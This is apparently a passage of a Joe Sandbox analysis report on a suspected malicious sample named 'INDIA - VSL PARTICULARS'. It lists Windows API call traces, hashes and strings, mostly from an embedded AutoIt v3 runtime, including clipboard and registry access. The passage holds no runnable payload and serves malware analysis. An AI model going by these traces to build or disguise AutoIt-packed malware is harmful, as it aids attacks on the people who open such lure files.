                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                              • String ID:
                              • API String ID: 69173610-0
                              • Opcode ID: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                              • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                              • Opcode Fuzzy Hash: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                              • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                              APIs
                              • DestroyWindow.USER32(?), ref: 004590F2
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                              • GetStockObject.GDI32(00000011), ref: 004592AC
                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                              • DeleteDC.GDI32(00000000), ref: 004592D6
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                              • GetStockObject.GDI32(00000011), ref: 004593D3
                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                              • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-3360698832
                              • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                              • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                              • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                              • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                              • SetCursor.USER32(00000000), ref: 0043075B
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                              • SetCursor.USER32(00000000), ref: 00430773
                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                              • SetCursor.USER32(00000000), ref: 0043078B
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                              • SetCursor.USER32(00000000), ref: 004307A3
                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                              • SetCursor.USER32(00000000), ref: 004307BB
                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                              • SetCursor.USER32(00000000), ref: 004307D3
                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                              • SetCursor.USER32(00000000), ref: 004307EB
                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                              • SetCursor.USER32(00000000), ref: 00430803
                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                              • SetCursor.USER32(00000000), ref: 0043081B
                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                              • SetCursor.USER32(00000000), ref: 00430833
                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                              • SetCursor.USER32(00000000), ref: 0043084B
                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                              • SetCursor.USER32(00000000), ref: 00430863
                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                              • SetCursor.USER32(00000000), ref: 0043087B
                              • SetCursor.USER32(00000000), ref: 00430887
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                              • SetCursor.USER32(00000000), ref: 0043089F
                              Similarity
                              • API ID: Cursor$Load
                              • String ID:
                              • API String ID: 1675784387-0
                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                              APIs
                              • GetSysColor.USER32(0000000E), ref: 00430913
                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • GetSysColor.USER32(00000012), ref: 00430933
                              • SetTextColor.GDI32(?,?), ref: 0043093B
                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • GetSysColor.USER32(0000000F), ref: 00430959
                              • CreateSolidBrush.GDI32(?), ref: 00430962
                              • GetSysColor.USER32(00000011), ref: 00430979
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • SelectObject.GDI32(?,00000000), ref: 0043099C
                              • SetBkColor.GDI32(?,?), ref: 004309A6
                              • SelectObject.GDI32(?,?), ref: 004309B4
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                              • GetSysColor.USER32(00000011), ref: 00430A9F
                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                              • SelectObject.GDI32(?,?), ref: 00430AD0
                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                              • SelectObject.GDI32(?,?), ref: 00430AE3
                              • DeleteObject.GDI32(?), ref: 00430AE9
                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                              Similarity
                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1582027408-0
                              • Opcode ID: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                              • Opcode Fuzzy Hash: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                              Similarity
                              • API ID: CloseConnectCreateRegistry
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 3217815495-966354055
                              • Opcode ID: 4426f4ce80acdf53cad9cfed0f21911b2ffa5f4c9bc0ee367fa9e54fa9040c70
                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                              • Opcode Fuzzy Hash: 4426f4ce80acdf53cad9cfed0f21911b2ffa5f4c9bc0ee367fa9e54fa9040c70
                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                              APIs
                              • GetCursorPos.USER32(?), ref: 004566AE
                              • GetDesktopWindow.USER32 ref: 004566C3
                              • GetWindowRect.USER32(00000000), ref: 004566CA
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                              • DestroyWindow.USER32(?), ref: 00456746
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                              • IsWindowVisible.USER32(?), ref: 0045682C
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                              • GetWindowRect.USER32(?,?), ref: 00456873
                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                              • CopyRect.USER32(?,?), ref: 004568BE
                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                              Similarity
                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                              • String ID: ($,$tooltips_class32
                              • API String ID: 225202481-3320066284
                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                              • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                              • GetClientRect.USER32(?,?), ref: 00471D05
                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                              • GetClientRect.USER32(?,?), ref: 00471E8A
                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                              Similarity
                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                              • String ID: @$AutoIt v3 GUI
                              • API String ID: 867697134-3359773793
                              • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                              • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                              Similarity
                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                              • API String ID: 1503153545-1459072770
                              • Opcode ID: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                              • Opcode Fuzzy Hash: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                              Similarity
                              • API ID: __wcsicoll$__wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                              • API String ID: 790654849-32604322
                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                              • Opcode Fuzzy Hash: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                              APIs
                                • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                              • _fseek.LIBCMT ref: 00452B3B
                              • __wsplitpath.LIBCMT ref: 00452B9B
                              • _wcscpy.LIBCMT ref: 00452BB0
                              • _wcscat.LIBCMT ref: 00452BC5
                              • __wsplitpath.LIBCMT ref: 00452BEF
                              • _wcscat.LIBCMT ref: 00452C07
                              • _wcscat.LIBCMT ref: 00452C1C
                              • __fread_nolock.LIBCMT ref: 00452C53
                              • __fread_nolock.LIBCMT ref: 00452C64
                              • __fread_nolock.LIBCMT ref: 00452C83
                              • __fread_nolock.LIBCMT ref: 00452C94
                              • __fread_nolock.LIBCMT ref: 00452CB5
                              • __fread_nolock.LIBCMT ref: 00452CC6
                              • __fread_nolock.LIBCMT ref: 00452CD7
                              • __fread_nolock.LIBCMT ref: 00452CE8
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452D78
                              Similarity
                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                              • String ID:
                              • API String ID: 2054058615-0
                              • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                              Similarity
                              • API ID: Window
                              • String ID: 0
                              • API String ID: 2353593579-4108050209
                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                              APIs
                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                              • GetWindowDC.USER32(?), ref: 0044A0F6
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                              • GetSysColor.USER32(0000000F), ref: 0044A131
                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                              • GetSysColor.USER32(00000005), ref: 0044A15B
                              • GetWindowDC.USER32(?), ref: 0044A1BE
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                              • GetSysColor.USER32(00000008), ref: 0044A265
                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                              Similarity
                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                              • String ID:
                              • API String ID: 1744303182-0
                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                              • __mtterm.LIBCMT ref: 00417C34
                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                              • __init_pointers.LIBCMT ref: 00417CE6
                              • __calloc_crt.LIBCMT ref: 00417D54
                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                              Similarity
                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                              • API String ID: 4163708885-3819984048
                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                              Similarity
                              • API ID:
                              • String ID: >>>AUTOIT SCRIPT<<<$\
                              • API String ID: 0-1896584978
                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                              Similarity
                              • API ID: __wcsicoll$IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2485277191-404129466
                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                              APIs
                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                              • SetWindowTextW.USER32(?,?), ref: 00454678
                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                              • GetWindowRect.USER32(?,?), ref: 004546F5
                              • SetWindowTextW.USER32(?,?), ref: 00454765
                              • GetDesktopWindow.USER32 ref: 0045476F
                              • GetWindowRect.USER32(00000000), ref: 00454776
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                              • GetClientRect.USER32(?,?), ref: 004547D2
                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                              APIs
                              • _wcslen.LIBCMT ref: 00464B28
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                              • _wcslen.LIBCMT ref: 00464C28
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                              • _wcslen.LIBCMT ref: 00464CBA
                              • _wcslen.LIBCMT ref: 00464CD0
                              • _wcslen.LIBCMT ref: 00464CEF
                              Similarity
                              • API ID: _wcslen$Directory$CurrentSystem
                              • String ID: D
                              • API String ID: 1914653954-2746444292
                              • Opcode ID: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                              APIs
                              • _wcsncpy.LIBCMT ref: 0045CE39
                              • __wsplitpath.LIBCMT ref: 0045CE78
                              • _wcscat.LIBCMT ref: 0045CE8B
                              • _wcscat.LIBCMT ref: 0045CE9E
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                              • _wcscpy.LIBCMT ref: 0045CF61
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                              Similarity
                              • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                              • String ID: *.*
                              • API String ID: 1153243558-438819550
                              • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                              • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                              • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                              Similarity
                              • API ID: __wcsicoll
                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                              • API String ID: 3832890014-4202584635
                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                              APIs
                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
